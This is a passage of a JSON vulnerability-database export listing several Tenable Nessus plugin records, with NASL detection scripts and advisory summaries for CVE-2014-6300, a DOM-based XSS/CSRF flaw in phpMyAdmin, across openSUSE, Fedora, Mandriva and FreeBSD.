script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"phpMyAdmin\";\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:appname, port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, appname, port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, appname + \" 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.3\n# 4.1.x < 4.1.14.4\n# 4.2.x < 4.2.8.1\ncut_off = NULL;\nfixed_ver = NULL;\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.3';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.4';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.8.1';\n}\n\n# The following should never happen at this\n# point, but best to be safe and check anyway.\nif (isnull(cut_off) || isnull(fixed_ver))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/' + port + '/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:27", "description": "Versions of phpMyAdmin earlier than 4.0.10.3, 4.1.14.4, or 4.2.8.1 are unpatched for a DOM-based cross-site scripting vulnerability in the micro-history feature that could be leveraged for cross-site request forgery -- that is, by deceiving a logged-in user to click on a crafted URL, an attacker could perform remote code execution and in some cases, create a root account, via the user's account.", "cvss3": {"score": 3.7, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.3, 4.1.x < 4.1.14.4, 4.2.x < 4.2.8.1 CSRF (PMASA-2014-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8409.PRM", "href": "https://www.tenable.com/plugins/nnm/8409", "sourceData": "Binary data 8409.prm", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:42", "description": "phpMyAdmin was updated to 4.1.14.4 (2014-09-13) fixing bugs and security issues.\n\n - PMASA-2014-10 (CVE-2014-6300, CWE-661 CWE-352) http://www.phpmyadmin.net/home_page/security/PMASA-2014- 10.php\n\n A DOM based XSS was fixed that resulted to a CSRF that creates a ROOT account in certain conditions.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-23T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1150-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpMyAdmin", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-551.NASL", "href": "https://www.tenable.com/plugins/nessus/77804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-551.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77804);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6300\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1150-1)\");\n script_summary(english:\"Check for the openSUSE-2014-551 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin was updated to 4.1.14.4 (2014-09-13) fixing bugs and\nsecurity issues.\n\n - PMASA-2014-10 (CVE-2014-6300, CWE-661 CWE-352)\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-\n 10.php\n\n A DOM based XSS was fixed that resulted to a CSRF that\n creates a ROOT account in certain conditions.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00032.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.4-1.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.4-12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:39", "description": "phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-23T00:00:00", "type": "nessus", "title": "Fedora 21 : phpMyAdmin-4.2.8.1-2.fc21 (2014-10885)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-10885.NASL", "href": "https://www.tenable.com/plugins/nessus/77797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10885.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77797);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"FEDORA\", value:\"2014-10885\");\n\n script_name(english:\"Fedora 21 : phpMyAdmin-4.2.8.1-2.fc21 (2014-10885)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that\n creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141635\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138045.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7721746f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"phpMyAdmin-4.2.8.1-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:33", "description": "Updated phpmyadmin package fixes security vulnerability :\n\nIn phpMyAdmin before 4.2.9, by deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature (CVE-2014-6300).", "cvss3": {"score": null, "vector": null}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:183)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-183.NASL", "href": "https://www.tenable.com/plugins/nessus/77840", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:183. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77840);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"MDVSA\", value:\"2014:183\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:183)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated phpmyadmin package fixes security vulnerability :\n\nIn phpMyAdmin before 4.2.9, by deceiving a logged-in user to click on\na crafted URL, it is possible to perform remote code execution and in\nsome cases, create a root account due to a DOM based XSS vulnerability\nin the micro history feature (CVE-2014-6300).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0383.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.9-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:37", "description": "phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Fedora 19 : phpMyAdmin-4.2.8.1-2.fc19 (2014-10989)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-10989.NASL", "href": "https://www.tenable.com/plugins/nessus/77873", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10989.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77873);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"FEDORA\", value:\"2014-10989\");\n\n script_name(english:\"Fedora 19 : phpMyAdmin-4.2.8.1-2.fc19 (2014-10989)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that\n creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141635\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?170a450f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"phpMyAdmin-4.2.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:34", "description": "The phpMyAdmin development team reports :\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\n\nBy deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-15T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature (cc627e6c-3b89-11e4-b629-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CC627E6C3B8911E4B6296805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/77679", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77679);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6300\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature (cc627e6c-3b89-11e4-b629-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\n\nBy deceiving a logged-in user to click on a crafted URL, it is\npossible to perform remote code execution and in some cases, create a\nroot account due to a DOM based XSS vulnerability in the micro history\nfeature.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\"\n );\n # https://vuxml.freebsd.org/freebsd/cc627e6c-3b89-11e4-b629-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51bdfe94\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.8.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:39", "description": "phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Fedora 20 : 